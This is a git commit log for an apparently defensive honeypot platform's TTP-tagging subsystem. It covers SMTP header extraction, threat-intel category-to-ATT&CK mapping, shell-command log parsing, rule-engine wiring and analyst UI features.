e9324acac7 feat(smtp): emit X-Mailer / Return-Path / dkim+spf / URLs on message_stored
The EmailLifter (R0041–R0048) keys on header-derived signals that the
v0 _summarize_message did not extract. Add cheap Layer 2 projections
inside the existing single-pass parse:

* return_path / x_mailer — direct header reads, decoded RFC 2047
* dkim_signed / spf_pass — booleans derived from any
  Authentication-Results header (multiple lines tolerated; positive
  verdict on any line wins)
* urls — http(s) URLs lifted from text/* body parts via a tight
  regex, deduplicated first-seen-wins, capped at 64 in the wire
  payload to bound the syslog SD value

Heavyweight extraction (body simhash, office-macro detection,
HTML-smuggling, password-protected archives, mal-hash-match,
body_text projection) stays deferred per the EmailLifter heavyweight
DEBT entry — those rules need privacy / extractor decisions before
they ship.
2026-05-02 18:37:11 -04:00
2ce150a53e docs(debt): mark email.received producer as paid; file heavyweight follow-up
The 2026-05-02 paydown wires the producer at ingester.py after
add_bounty(), with the cheap projections (domains, rcpt_count,
attachment_count, x_mailer, dkim/spf, attachment shas + extensions,
URLs). R0041 / R0043 / R0044 / R0045 fire end-to-end after this PR;
R0046 partial.

The remaining lanes (R0042 body_simhash, R0046 macro / smuggling /
password / mal_hash, R0047 / R0048 body_text projection) are filed
as a new entry "EmailLifter heavyweight feature extraction" with the
field map and the privacy-vs-completeness fork on body_text called
out for the next maintainer to pick a side.
2026-05-02 18:24:51 -04:00
9a7d116351 docs(ttp): sync A.10 + rewrite §9 drift runbook + DEBT.md markers
Appendix A.10 corrected to match the post-2026-05-02-audit reality:
AbuseIPDB cat 7/13/16/17 land on their canonical AbuseIPDB names
(Phishing / VPN IP / SQL Injection / Spoofing); cats 4 and 10 carry
explicit "drop" annotations so the next reviewer sees the intent
rather than guessing. ThreatFox table re-keys on `threat_type` (the
canonical taxonomy field) and adds the `payload` and `cc_skimming`
rows. GreyNoise table promotes bare-malicious to a half-multiplier
emission of T1071.

§"Hard parts §9 Intel provider drift" replaces the prose handwave
with a runnable check: provider URLs, the ThreatFox curl invocation
that needs DECNET_THREATFOX_API_KEY, the rule_version + emits +
attack_catalog co-evolution rules, and the full chain of files to
exercise. Adds a "Ship-time audit log" subsection so future quarterly
runs have a known-good baseline to diff against.

DEBT.md item #1 records LAST_REVIEWED: 2026-05-02 / NEXT_REVIEW:
2026-08-02 and points at §9 for the runbook. DEBT.md item #3 (the
attacker.email.received producer) flags its gating premise as
potentially stale — ANTI noted SMTP honeypots already persist
received messages, contradicting the "no source row" claim that
deferred the wiring.
2026-05-02 18:09:20 -04:00
f8dee596e5 fix(ttp): expand R0054/R0055/R0057 emits + LAST_REVIEWED markers
The IntelLifter's _emit_filtered fans out only the rule.emits entries
whose technique_id appears in the predicate's decision set. v1's emits
lists were narrow supersets of the common case, silently dropping the
rest of the predicate's possible emissions:

  R0054 dropped: T1046 (cat 14), T1078 (cat 20), T1090 (cats 9/13),
                 T1496 (cat 11), T1595 (cats 14/19)
  R0055 dropped: T1090 (tor_exit_node), T1110 (ssh_bruteforcer),
                 T1588 (the second emit of every C2-framework tag)
  R0057 dropped: T1105 (payload_delivery, download_url)

Bump rule_version 1->2 on R0054/R0055/R0057, expand emits to cover
every technique the predicate produces. R0056 (Feodo) and R0058
(aggregate bump) carry no enum and stay at v1.

All five YAMLs gain `last_reviewed: "2026-05-02"` and
`next_review: "2026-08-02"` markers; the rule YAML is now the
canonical record of when the mapping was last reconciled against
upstream, with DEBT.md as the calendar reminder.
2026-05-02 18:09:03 -04:00
75ff0ede1f fix(ttp): correct intel_lifter mappings + repoint ThreatFox to threat_type
Three bug classes uncovered by the 2026-05-02 ship-time audit:

* AbuseIPDB code/name mismatch in v1: cat 10 was treated as DDoS (it's
  Web Spam — DDoS is cat 4, intentionally unmapped per A.10) and cat 17
  as VPN IP (it's Spoofing — VPN IP is cat 13). Both typos mirrored in
  code AND the design doc Appendix A.10. Code now matches the AbuseIPDB
  taxonomy exactly; cat 17 retargets to T1566 (email-spoofing as a
  phishing precursor), and cats 7 (Phishing) and 16 (SQL Injection)
  pick up T1566 / T1190 emissions that v1 didn't cover.

* ThreatFox dispatch keyed on `ioc_type` in v1, but `ioc_type` is the
  indicator format (url / domain / hash variants) and carries no ATT&CK
  signal. The canonical taxonomy field per ThreatFox's API is
  `threat_type` (botnet_cc / payload_delivery / payload / cc_skimming).
  Repoint dispatch through the new `threatfox_threat_types` payload
  field; `ioc_type` rides as evidence only. Also adds the missing
  cc_skimming -> T1056 (Input Capture) mapping and registers T1056 in
  attack_catalog.py.

* GreyNoise bare-malicious lane: a `classification == "malicious"` row
  with no recognised tag used to emit nothing. Now lights T1071 at a
  half multiplier, suppressed when a tag already fires T1071 to avoid
  double-stamping at conflicting confidence levels.
2026-05-02 18:08:48 -04:00
a31ad82880 feat(intel): project per-provider taxonomy into attacker.intel.enriched payload
The TTP worker forwards the bus payload verbatim to the IntelLifter as
TaggerEvent.payload. The pre-audit publish payload only carried
{attacker_uuid, attacker_ip, aggregate_verdict, providers}, so even with
the new AttackerIntel taxonomy columns populated the lifter still saw
nothing. Lift the relevant fields (categories / tags / threat_types /
malware family / score / classification) into the bus event and decode
JSON-string list columns back to native lists at the boundary.
2026-05-02 18:08:29 -04:00
999d3494b4 feat(intel): persist per-provider taxonomy on AttackerIntel for TTP dispatch
The 2026-05-02 ship-time audit of the R0054-R0058 intel rule pack found
that AbuseIPDB / GreyNoise / ThreatFox stored only the aggregate verdict
(score / classification / listed-bool) plus the raw response blob. The
TTP IntelLifter expects per-provider taxonomy fields (categories, tags,
threat_types) that were never populated, so R0054 / R0055 / R0057
emitted zero tags in production despite passing unit tests.

Add typed columns: abuseipdb_categories, greynoise_tags, greynoise_name,
feodo_malware_family, threatfox_threat_types, threatfox_ioc_types,
threatfox_malware_families. Each provider now parses the relevant
taxonomy out of the upstream response and writes it through
column_updates. JSON-list columns ride as TEXT with default "[]" to
keep the SQLite/MySQL backend split honest, deserialised back to native
lists by the repo on read.
2026-05-02 18:07:57 -04:00
d1c4a48963 feat(ttp): split bash CMD evidence into structured uid/user/src/pwd/cmd rows
The inspector was dumping the whole `CMD uid=0 user=root src=… pwd=…
cmd=nmap -p- 192.168.1.0/24` syslog body into a single ``command_text``
blob. ANTI: "I'd like to separate the fields." Done — three layers
work together:

1. Collector session aggregator: new `_parse_cmd_msg` splits the bash
   PROMPT_COMMAND msg into `{uid, user, src, pwd, command}`. The
   session-ended envelope's per-command dict now carries the
   structured fields, with `command_text` set to just the cmd= value
   (preserving embedded whitespace — `nmap -p- 1.2.3.0/24` etc.).

2. Rule engine: per-source_kind auxiliary evidence list
   (`_AUX_EVIDENCE_FIELDS`). For `command` events the engine
   automatically promotes uid/user/src/pwd into the persisted
   `evidence` dict on top of the rule's explicit `evidence_fields`.
   Engine-controlled, not per-rule — adding a new aux field is one
   line here, not a 30-rule YAML sweep, and rule authors can't
   accidentally drop it.

3. TTPInspector frontend: evidence renders as a structured
   `kvs` grid (UID / USER / SRC / PWD / CMD rows) instead of
   pretty-printed JSON. Primary-order list keeps shell fields at
   the top; everything else falls below alphabetically so unfamiliar
   evidence shapes still surface predictably.

Tests:
- session_aggregator pins the structured-fields emit (uid/user/src/
  pwd/command_text without "CMD" prefix, embedded whitespace
  preserved).
- rule_engine_tagger pins the aux-field auto-promotion + the
  no-`None`-leakage path when payload doesn't carry an aux key.
2026-05-02 03:20:53 -04:00
84699f89da feat(ttp): show canonical ATT&CK technique names in the TTPs UI
"T1595" alone is opaque; "T1595 — Active Scanning" tells you the
story at a glance. The names come from a backend-side static catalogue
pinned to the same ATT&CK release as the rule engine
(_ATTACK_RELEASE = "v15.1") — names are the canonical MITRE labels,
not author-supplied strings on rules, so a rule author can't typo a
name and the entire fleet sees the typo.

- New `decnet/ttp/attack_catalog.py` with `TECHNIQUE_NAMES` covering
  every technique_id + sub_technique_id emitted by `rules/ttp/`
  (R0001..R0058 → 69 IDs in the v0 pack).
- `IdentityTechniqueRow` / `TechniqueRollupRow` / `CampaignTechniqueRow`
  / `TTPTagDetailRow` gain optional `technique_name` /
  `sub_technique_name` fields. Repo + router populate them from the
  catalogue at row-construction time. None when an ID isn't in the
  catalogue — UI falls back to the bare ID.
- Coverage test (`tests/ttp/test_attack_catalog.py`) walks every
  YAML rule and asserts every emitted ID has a catalogue entry, so
  a future rule author who forgets to update the catalogue gets a
  loud failure rather than a silent UI fallback.

Frontend:
- `TTPsObservedSection` shows "T1595.002 — Active Scanning:
  Vulnerability Scanning" instead of just the ID, with overflow
  ellipsis + tooltip for narrow viewports. Inspector header /
  TECHNIQUE row also surface the names.
2026-05-02 03:10:07 -04:00
42e9492118 feat(ttp): inspector drawer surfaces evidence + rule_id behind each technique
The TTPsObservedSection rollup tells the operator "we saw T1059" but
not why. Click any technique row → side drawer opens listing every
ttp_tag row in scope with the persisted evidence JSON, firing
rule_id / rule_version, source_kind / source_id, confidence, and
created_at. Mirrors the CredentialReuseInspector / BountyInspector
pattern (drawer-backdrop + bd-head/bd-body + kvs grid).

Backend:
- New `GET /api/v1/ttp/tags/by-{scope}/{uuid}/{technique_id}`
  (`scope ∈ {identity, attacker, session}`, optional
  `?sub_technique_id=`, `?limit=` capped to 1000). Returns raw
  TTPTag rows newest-first.
- New `TTPTagDetailRow` Pydantic model + re-export.
- New repo method `list_tags_by_scope_and_technique` on
  TTPMixin (+ abstract on BaseRepository) — single query branched
  on scope; identity scope projects through `Attacker.identity_id`
  the same way `list_techniques_by_identity` does.
- Tests: evidence round-trips, sub_technique filter, JWT-required,
  empty scope, unknown scope rejected.

Frontend:
- New `TTPInspector.tsx` + `TTPInspector.css` (violet accent, slide
  animation, focus-trapped panel matching the existing inspector
  family).
- `TTPsObservedSection`'s TechniqueBar is now click+keyboard
  activatable; clicking opens the inspector for that
  (technique, sub_technique) tuple.

mypy clean. 532 passed in the targeted sweep.
2026-05-02 02:55:05 -04:00
c4e29e3bf9 fix(ttp): resolve attacker_uuid from attacker_ip on bus-event consume
The collector's `attacker.session.ended` envelope carries
`attacker_uuid: null` and `attacker_ip: <ip>` because the collector
doesn't talk to the DB. The TTP worker passed that null straight
through, and `TTPTag.__init__` raised the documented invariant:

    ValueError: ttp_tag requires at least one of attacker_uuid /
                identity_uuid; both NULL is not a valid anchor.

The worker now resolves `attacker_uuid` from `attacker_ip` via
`BaseRepository.get_attacker_uuid_by_ip` before fanning out the
event. When the IP isn't in the DB yet (profiler hasn't ingested
the row), the event is dropped with one log line — better than
exploding mid-tag.

- New `get_attacker_uuid_by_ip(ip) -> str | None` on the repo
  (BaseRepository abstract + AttackersCoreMixin impl).
- `_resolve_attacker_uuid` helper in `decnet/ttp/worker.py` runs
  before `_build_events`. Short-circuits when the payload already
  has either anchor; drops the event when neither anchor is
  resolvable.
- Tests pin: short-circuit on existing uuid/identity, repo lookup,
  drop on unknown IP, drop on "Unknown" sentinel, drop on
  no-anchor payload, drop on repo failure.
2026-05-02 02:44:30 -04:00
f9901befc4 docs(ttp): catalogue producer wiring for every TTP-watched topic
Add a "Producer wiring" subsection under TTP_TAGGING.md §"Bus
topics" mapping every topic the TTP worker subscribes to onto the
file:line that publishes it. Calls out the gap (`email.received`
has no producer today) and the new `attacker.session.ended`
payload shape from the collector aggregator.

Also lists the four producer regression tests added in this series
so a future contributor sees the safety net before staring at the
silent rule engine.

DEBT.md gets the `attacker.email.received` follow-up entry — wire
the producer when SMTP-receive persistence lands, since today the
honeypot relay path doesn't store received emails anywhere a
publisher could read from.
2026-05-02 02:39:23 -04:00
b5ce236cab test(bus): pin scope-(2) producer wiring for reuse / clusterer / intel
Three producer-side regression guards. Each drives the worker's run
loop with a fake bus + stubbed repo and asserts the documented topic
fires when the producer has data:

- reuse correlator → credential.reuse.detected (one finding row)
- clusterer → identity.formed + identity.merged (one ClusterResult)
- intel worker → attacker.intel.enriched (one unenriched attacker
  + a fake provider returning a "malicious" verdict)

These complement commit 1's attacker.session.ended producer test —
together the four cover every TTP-relevant publisher in the tree
(modulo email.received, which has no producer yet; tracked in
DEBT.md).
2026-05-02 02:38:24 -04:00
b043c96d29 feat(collector): publish attacker.session.ended on session_recorded events
The TTP worker subscribes to attacker.session.ended but no upstream
component published it — the rule pack (R0001–R0030) therefore never
fired on live SSH traffic even after the consume-side wiring landed
in E.3.18a/b/c.

The collector now hosts a per-attacker_ip command index
(_SessionAggregator) that watches the same parsed-event stream as
_publish_log. Shell `command` events are appended to a per-IP list;
on `session_recorded` the aggregator slices the list to commands
inside the [ended_at - duration_s, ended_at] window and publishes
attacker.session.ended with the session metadata + commands list.
The TTP worker's _build_events fan-out (E.3.18b) turns each command
into a source_kind="command" TaggerEvent that the RuleEngineTagger
(E.3.18c) matches against R0001–R0030.

Memory bound: per-IP entries TTL-evict at DECNET_COLLECTOR_SESSION_AGG_TTL_SEC
(default 3600 s). Publish failures are swallowed in the aggregator —
a misbehaving bus cannot stall the per-container stream threads.
2026-05-02 02:35:08 -04:00
d9d2a80573 fix(collector): unwrap double-wrapped RFC5424 around bash PROMPT_COMMAND
Honeypot SSH containers run `PROMPT_COMMAND` that calls
`logger --rfc5424 --msgid command -t bash "CMD …"`. The Docker-stdout
reader prepends an outer RFC5424 envelope (HOSTNAME=<decky>,
APP-NAME=1, MSGID=NIL) around that inner syslog line. Both the
collector parser (`parse_rfc5424`) and the correlation parser
(`parse_line`) saw the outer NIL MSGID and emitted `event_type="-"`
for every shell command — which:
  - kept `Attacker.commands` rows missing `command_text`
  - left R0001–R0030 (the pattern rule pack that matches shell
    commands) with no haystack
  - made `decnet.collector.log` show `event written … type=-`
    for the very lines that should be `type=command`

Both parsers now detect the inner-RFC5424 shape (`<TS> <HOST> <APP>
<PROCID> <MSGID> <rest>`) when the outer MSGID is NIL and the SD-arm
is also NIL, and re-extract HOSTNAME / APP-NAME / MSGID / remainder
from the body. The collector parser also recovers the post-SD msg
tail when the SD block isn't `relay@55555` (the bash CMD line carries
a `[timeQuality …]` block) so the kv-fallback can find `src_ip`.

Mirroring tests in tests/collector and tests/correlation pin both
the unwrap and the regression guard for non-double-wrapped lines.
2026-05-02 02:32:21 -04:00
e08bfc4a73 fix(ttp): /api/v1/ttp/rules returns the live rule catalogue
The endpoint was a contract-phase stub returning `[]` even though the
RuleStore loaded all 58 YAML rules at worker startup. UI saw an empty
table; operators couldn't tell whether anything was wired up.

- `api_list_rules` now calls `get_rule_store().load_compiled()` and
  serializes each CompiledRule + its operational state into a
  RuleCatalogueRow. Sorted by rule_id for stable golden snapshots.
- Add `description: str` to RuleSchema (pydantic) and CompiledRule
  (NamedTuple, defaulted) + propagate through `_compile_one` so the
  catalogue surfaces the human-readable YAML description, not just
  the slug-style `name`.
- Update `tests/ttp/test_rule_engine.py` _fields assertion for the
  new column; new `tests/api/ttp/test_rules_catalogue.py` pins the
  catalogue contents (R0001/R0014 presence, row shape, sort order).

Worker behaviour is unchanged: it was already loading rules
correctly. This is purely a read-side wiring fix on the operator API.
2026-05-02 01:54:06 -04:00
7ab0df3680 chore(cleaning): deleted swp vimfile 2026-05-02 01:39:17 -04:00
ca1e04033c docs(ttp): E.5 verification log appended to TTP_TAGGING.md
Closes the CDD design phase. Records:
- §E.1 contract inventory (every file exists, compileall clean).
- Targeted pytest pass: 604 passed, 1 skipped, 10 xfailed
  (all xfails are `xfail(strict=True)` with reason= pointing to the
  impl step that flips them; carry-overs, not flakes).
- Strict mypy over decnet/ttp + decnet/cli/ttp.py +
  decnet/web/router/ttp + decnet/web/db/sqlmodel_repo/ttp.py: clean.
- Stranger-readability spot check on tests/ttp/: no doc bugs.

Notes the three pre-E.4 wiring fixes (E.3.18a/b/c) and the E.4
backfill CLI / DEBT entries that landed in this series.
2026-05-02 01:37:45 -04:00
7d1f048764 docs(ttp): E.4.b/E.4.c DEBT entries — provider review + Sigma deferral
Quarterly TTP provider mapping review for AbuseIPDB / GreyNoise /
abuse.ch (Feodo Tracker, ThreatFox) catalogue drift against
`rules/ttp/R0054..R0058`, and the post-v1 trigger for the Sigma rule
adapter. Both items reference TTP_TAGGING.md sections so the
rationale stays linked to the design doc.
2026-05-02 01:35:49 -04:00
301d3feee9 feat(ttp): E.4.a extract decnet/cli/ttp.py with worker run + backfill CLI
The TTP worker entry moved out of decnet/cli/workers.py into its own
module so the TTP CLI surface (worker + admin verbs) is colocated,
mirroring decnet/cli/canary.py / webhook.py / swarm.py.

- New `decnet/cli/ttp.py` with `decnet ttp` (worker, ExecStart-stable
  for decnet-ttp.service) and `decnet ttp-backfill --since-days N`.
- `decnet ttp-backfill` walks Attacker.commands and CanaryTrigger
  history, dispatches each row through the live CompositeTagger,
  persists tags via repo.insert_tags (idempotent INSERT OR IGNORE).
  --dry-run / --source command|canary|all / --batch-size supported.
- Backfill deliberately bypasses bus publish — historical replay
  must not re-trigger SIEM/webhook fan-out per TTP_TAGGING.md
  §"Bus topics" loop-prevention invariant.
- Added `iter_attacker_commands_since` / `iter_canary_triggers_since`
  read-only iterators on TTPMixin + abstract bindings on
  BaseRepository.
- Master-only via gating; both `ttp` and `ttp-backfill` listed in
  MASTER_ONLY_COMMANDS.
2026-05-02 01:35:17 -04:00
e84b522fd3 feat(ttp): E.3.18c wire RuleEngine via RuleEngineTagger
The canonical rule-based engine from §"Tagging engines, layered §1"
of TTP_TAGGING.md was fully implemented but never instantiated as a
composite child — pure pattern rules (R0014/R0017/R0023/... 23 rules
total) had no tagger to dispatch them.

- Add `RuleEngineTagger(Tagger)` adapter in rule_engine.py wrapping
  `RuleEngine.evaluate()`. `HANDLES = {command, http_request,
  auth_attempt, payload}` — the source kinds whose rules typically
  live outside any per-source lifter.
- Adapter's `watch_store()` filters via `_is_engine_owned` so the
  engine's dispatch index excludes lifter-claimed rules
  (`match.kind: lifter:*`) and stays disjoint from per-lifter ownership.
- Prepend `RuleEngineTagger` to the `CompositeTagger` lifter list so
  generic pattern rules dispatch before per-source cross-event logic.
- Composes with E.3.18a (worker hydrates `watch_store`) and E.3.18b
  (worker fans session payloads into per-`command` events) — together
  these three commits make R0001–R0030 actually fire at runtime.
2026-05-02 01:29:58 -04:00
65435f1427 feat(ttp): E.3.18b worker fans session-ended payloads into per-command events
R0001–R0030 declare `applies_to: [command]` and match per command, not
per session. The worker now translates one `attacker.session.ended`
payload carrying a `commands: list` into:
  - one source_kind="session" event (behavioral / cross-event lifters)
  - one source_kind="command" event per command (RuleEngineTagger)

Both string and dict command shapes are accepted; dicts contribute
their `id` / `uuid` / `command_id` as the per-command source_id so
the deterministic `compute_tag_uuid` keeps replays idempotent. Tags
from session + per-command dispatch are aggregated into a single
`ttp.tagged` envelope per upstream session.
2026-05-02 01:27:37 -04:00
44ade3eb63 fix(ttp): E.3.18a worker hydrates per-lifter rule indexes via watch_store
Each per-source lifter holds its own RuleIndex and exposes an
`async watch_store()` that loads the corpus and drains store change
events forever. Until this commit nothing called `watch_store()` in
production — every dispatch index stayed empty and no rule fired.

- Add `WatchableTagger` runtime-checkable Protocol in `decnet.ttp.base`.
- `CompositeTagger.iter_watchables()` yields lifters that satisfy it.
- `run_ttp_worker_loop` fans out one task per watchable, cancelled
  and awaited alongside pump/heartbeat/control in the existing finally.
- Watch failures log and exit the watch task without taking the
  worker down — mirrors the pump-task tolerance contract.
2026-05-02 01:25:15 -04:00
9a31d0e50c feat(ttp): E.3.17 worker registration + scoped schemathesis suite
Wires decnet-ttp as a first-class worker:

* `decnet ttp` CLI command (master-only via MASTER_ONLY_COMMANDS)
* deploy/decnet-ttp.service.j2 systemd unit (After= identity / intel
  / reuse-correlator workers; ProtectHome=read-only since
  FilesystemRuleStore only reads ./rules/ttp/)
* deploy/decnet.target Wants= chain extended with decnet-ttp.service
* `ttp` was already in web/worker_registry.KNOWN_WORKERS

tests/api/test_schemathesis_ttp.py: TTP-routes-only schemathesis
suite, filtered via the OpenAPI tags=["TTP Tagging"] annotation
shared by the eight TTP routes. Reuses the live uvicorn subprocess
the wider test_schemathesis spawns; max_examples=400 keeps the
focused gate fast for E.3.13–E.3.16 iteration.

wiki-checkout/Service-Bus.md committed in its own repo: ttp.tagged
and ttp.rule.fired.<id> flipped from "reserved (TTP worker)" to
"decnet.ttp.worker" now that the worker publishes them.
2026-05-01 21:26:46 -04:00
07a609973b feat(ttp): E.3.16 frontend TTP UI
TTPsObservedSection.tsx: shared analyst-facing rollup. scope=
identity drives /ttp/by-identity/{uuid} (primary, with Navigator
export download); scope=attacker drives /ttp/by-attacker/{uuid}
(per-IP slice). Tactic → technique tree in fixed UKC-aligned order,
counts and confidence-weighted bars. Literal "NO TECHNIQUES
OBSERVED YET" empty state per TTP_TAGGING.md §"UI surface — Empty
state": no spinner, no fallback list.

RuleStateControls.tsx: admin-only rule operational state panel
backed by POST/DELETE /ttp/rules/{rule_id}/state. Server-gated by
require_admin AND client-gated on /config?.role so a non-admin
never sees the controls (per feedback_serverside_ui.md the client
gate is UX, not security — the server returns 403 either way).
Wired into Config.tsx as a new "TTP RULES" admin tab.

Wired TTPsObservedSection into IdentityDetail (above fingerprints)
and AttackerDetail (above TIMELINE). DeckyFleet/PersonaGeneration
vocabulary throughout (logs-section / section-header / btn /
matrix-text / dim-chip).

tsc --noEmit and vite build clean.

The dev-server browser smoke is deferred per the "can't reliably
exercise UI from this harness" reality — typecheck + build is the
correctness gate, not feature verification.
2026-05-01 21:05:28 -04:00
403d83faba feat(ttp): E.3.15 UKC bridge — production phase-handoff edge fires
Add BaseRepository.list_ttp_decky_phases(identity_uuid) returning
per-decky tag observations as (decky_id, tactic, created_at_ts) rows
ordered by creation time. Rewrite from_identity_row() to project
tactic → UKCPhase via tactic_to_ukc_phase and populate the four
phase-handoff maps (first/last_phase_per_decky,
first/last_seen_per_decky) so combined_campaign_weight finally lights
up on real DB rows — not just synthetic fixtures.

ConnectedComponentsCampaignClusterer.tick() pulls each active
identity's per-decky phase observations before projecting features.
Repo failures are non-fatal: a partial repo falls back to the empty
phase-handoff signal (legacy behavior) so the worker stays up.

tests/clustering/test_ttp_phase_handoff.py pins the production-row
pair clearing CAMPAIGN_EDGE_THRESHOLD on a C2 → DISCOVERY hand-off —
the trip-wire that says the whole project paid off.

commands_by_phase_on_decky itself stays empty on the production path:
it is consumed only by the synthetic-fixture similarity surface, and
the phase-handoff edge does not use it. Synthetic fixtures still
populate it directly via from_synthetic_identity.
2026-05-01 21:01:58 -04:00
101127247e feat(ttp): E.3.14 worker bootstrap (insert + ttp.tagged publish)
Inner loop drains a per-process asyncio.Queue populated by one pump
task per topic in _TOPICS, dispatches each event through
CompositeTagger, persists via repo.insert_tags(), and publishes
ttp.tagged + per-technique ttp.rule.fired.<id> only when the insert
returned a non-zero rowcount.

CompositeTagger seeded with all six lifters (Behavioral, Intel,
CanaryFingerprint, Email, Identity, Credential).

Loop-prevention invariant from TTP_TAGGING.md §"Bus topics" enforced:
N replays of the same upstream event publish exactly one ttp.tagged
event. test_worker_bus covers both the direct invocation path and
the idempotency replay path.

Intel catch-up via attacker.session.ended is intentionally deferred
to E.3.14b — needs a session→intel join the repo doesn't expose yet.
2026-05-01 20:57:57 -04:00
322fd44d72 feat(ttp): E.3.13 IdentityLifter + CredentialLifter (R0001-R0006)
IdentityLifter owns lifter:identity_* — currently R0003 (password
spraying). CredentialLifter owns lifter:credential_* — R0001 generic
auth brute, R0002 password guessing, R0004 credential reuse, R0005
valid-account use, R0006 default credentials.

YAMLs R0001/R0002/R0003/R0005/R0006 had their match.kind normalised
to fit the lifter prefix scheme — the design doc's promised "YAMLs
normalised in a separate refactor commit" lands here.

Identity-rollup tags null out attacker_uuid on emit so the worked-
example invariant holds (the tag belongs to the Identity, never to
one member IP).

Tests: test_identity_lifter.py + test_credential_lifter.py cover
each predicate's positive/negative path, state modulation
(disabled/clipped/expired), source-kind gating, and idempotent
replay. test_lifter_absence and test_lifters updated for the new
ctor signature.
2026-05-01 20:52:56 -04:00
62ad76615e docs(ttp): mark E.3.9-E.3.12 lifters done
Records the RuleIndex extraction prerequisite, the lifter:<owner>_
prefix routing convention, per-provider technique fan-out logic for
intel rules, the canary identity-merge guard rail, and the email PII
allowlist + R0042 simhash requirement.
2026-05-01 20:31:47 -04:00
7a89fbb357 feat(ttp): E.3.12 EmailLifter (R0041-R0048)
SMTP message-level technique tagger per Appendix A.6: open relay abuse
(rcpt_count + foreign From), mass phishing (rcpt_count + body simhash),
phishing-kit X-Mailer, IDN/punycode URL, sender masquerade composite
(From/Return-Path/DKIM/SPF), malicious attachment (macro/.lnk/.iso/.img/
hash match), BEC subject+body composite, encoded payload in body.

PII discipline (TTP_TAGGING.md §'Hard parts §6') is enforced at the
lifter layer via _filter_evidence(): emitted TTPTag.evidence is
restricted to the EmailEvidence-allowed allowlist (body_sha256,
matched_headers — names only, rcpt_domain_set — domains only,
attachment_sha256s, rcpt_count) plus PII-safe match discriminators
(matched_kit, matched_trigger, matched_url_host, etc). Raw addresses,
raw body bytes, full URLs, and decoded base64 previews NEVER appear in
evidence — defense-in-depth over the YAML evidence_fields hint.

Tests: tests/ttp/test_email_lifter.py per-rule positive + negative +
PII allowlist guard + state modulation. tests/ttp/rule_precision/
test_email_rules.py xfail flipped to real precision (R0041-R0048
H-band ≥95%). Corpus rows updated to acknowledge that R0045 (masquerade)
co-fires with R0041 / R0047 when the sender-masquerade signals are
present alongside open-relay or BEC patterns — overlap is by design,
not a precision bug.
2026-05-01 20:31:03 -04:00
f211d394e6 feat(ttp): E.3.11 CanaryFingerprintLifter (R0049-R0053)
Browser-payload derivations per Appendix A.9: navigator.webdriver flag,
canvas/audio/WebGL automation hash matches (Puppeteer/Playwright/
Selenium/curl-impersonate), WebRTC IP leak, TZ/language vs source-IP
geo mismatch, navigator.platform vs userAgent vs WebGL renderer
inconsistency.

Evidence shape pinned to CanaryFingerprintEvidence (metric +
matched_signature) — raw fingerprint blobs (canvas hashes, full UAs,
navigator.platform values) explicitly NOT carried into TTPTag.evidence
per TTP_TAGGING.md §'Hard parts §7' (enrichment vs tag boundary). The
identity-merge guard rail is preserved: composite fp.id matches across
IPs are NOT a TTP, so no rule fires on the bare hash.

Tests: tests/ttp/test_canary_fingerprint_lifter.py per-rule positive +
negative + evidence-shape guard + state modulation.
tests/ttp/rule_precision/test_canary_rules.py xfail flipped to real
precision (R0049/R0050/R0051/R0053 H-band ≥95%; R0052 M-band ≥80%).
2026-05-01 20:25:57 -04:00
7865e71aa9 feat(ttp): E.3.10 IntelLifter (R0054-R0058)
Per-provider verdict translator for AbuseIPDB, GreyNoise, Feodo Tracker,
and ThreatFox per Appendix A.10. Each rule's predicate inspects payload
fields produced by the enrich worker (no DB I/O, no decnet.intel.*
imports — E.2.7 decoupling guard preserved). AbuseIPDB confidence is
scaled by abuse_confidence_score / 100; categories drive per-technique
fan-out. R0058 aggregate-bump is a no-op in v0 (cross-tag bump deferred
to E.3.14 worker bootstrap).

Per-provider null tolerance is the steady state — a missing provider
column produces zero tags from that rule, never an error.

Tests:
- tests/ttp/test_intel_lifter.py — per-provider positive + negative +
  state modulation + decoupling source-import guard.
- tests/ttp/rule_precision/test_intel_rules.py — xfail flipped, real
  precision driven over seed_intel.jsonl (R0054-R0057 H-band ≥95%;
  R0058 skipped as bump-only).
- tests/ttp/test_lifter_absence.py — IntelLifter all-populated test
  flipped from xfail-strict to real assertion with realistic payload.
- tests/ttp/test_lifters.py — partial-null xfail flipped to real
  assertion.
2026-05-01 20:23:42 -04:00
eff3e4bce7 feat(ttp): E.3.9 BehavioralLifter (R0031-R0040)
Reads pre-shaped session aggregates from TaggerEvent.payload and emits
techniques per Appendix A behavior tables. Per-rule predicates dispatch
on match.kind (lifter:behavioral_<name>); the lifter holds its own
RuleIndex watching the same RuleStore as the engine, so disable / clip /
TTL state reaches lifter-bound rules through the same atomic-swap path.

R0032/R0036/R0037/R0040 YAMLs had over-escaped regex strings (\\
instead of \\) — fixed in place.

Factory wired so default get_tagger() returns CompositeTagger with
BehavioralLifter shipped; remaining three lifters (E.3.10-E.3.12) land
in subsequent commits.

E.2.6 contract preserved via TolerantTagger: empty payload steady-state
yields [] with zero ERROR records. Disabled / clipped / expired state
verified.
2026-05-01 20:17:59 -04:00
321ea7a2a6 refactor(ttp): normalise lifter:<owner>_<name> match.kind prefix
E.3.9.1 prerequisite. Rules R0031-R0040 now use lifter:behavioral_*,
R0041 (open_relay) uses lifter:email_open_relay; the rest of the email,
canary, and intel cohorts already conformed. Each lifter at E.3.9-E.3.12
will claim its rules via str.startswith('lifter:<owner>_'), keeping the
ownership routing explicit and trivially extensible.

R0001-R0006 / R0030 lifter:* rules are E.3.13 (Identity/Credential)
territory and stay as-is.
2026-05-01 20:10:33 -04:00
e7531ee756 refactor(ttp): extract RuleIndex from RuleEngine
E.3.9.0 prerequisite for the per-source lifters (E.3.9-E.3.13). The
dispatch index, install/evict/apply_change atomic-swap protocol, and
state-modulation helpers (is_active / apply_ceiling) move out of
rule_engine.py into _rule_index.py and _state.py. RuleEngine wraps a
RuleIndex; back-compat shims preserve _by_kind / _by_rule / _install
attribute access for tests poking at the dispatch internals.

Lifters in E.3.9-E.3.12 will each hold their own RuleIndex, watching
the same RuleStore via subscribe_changes() fan-out. Hot-reload
semantics (disable / clip / TTL via set_state API) now reach
lifter-bound rules through the same atomic-swap path the engine uses,
not a future composite-rebuild compromise.
2026-05-01 20:09:18 -04:00
b819dfefa3 feat(ttp): E.3.8 R0054-R0058 intel cohort + mark step done
5 YAMLs for the intel-verdict cohort per Appendix B / A.10:
AbuseIPDB category mapping, GreyNoise classification, Feodo
Tracker hit, ThreatFox IOC type, aggregate-malicious bump-only.
IntelLifter (E.3.10) consumes by rule_id and tolerates absence
silently (null provider column → no tag).

R0058 is the meta bump-only rule — emits a single confidence=0.0
sentinel so it validates and surfaces in the catalogue, but the
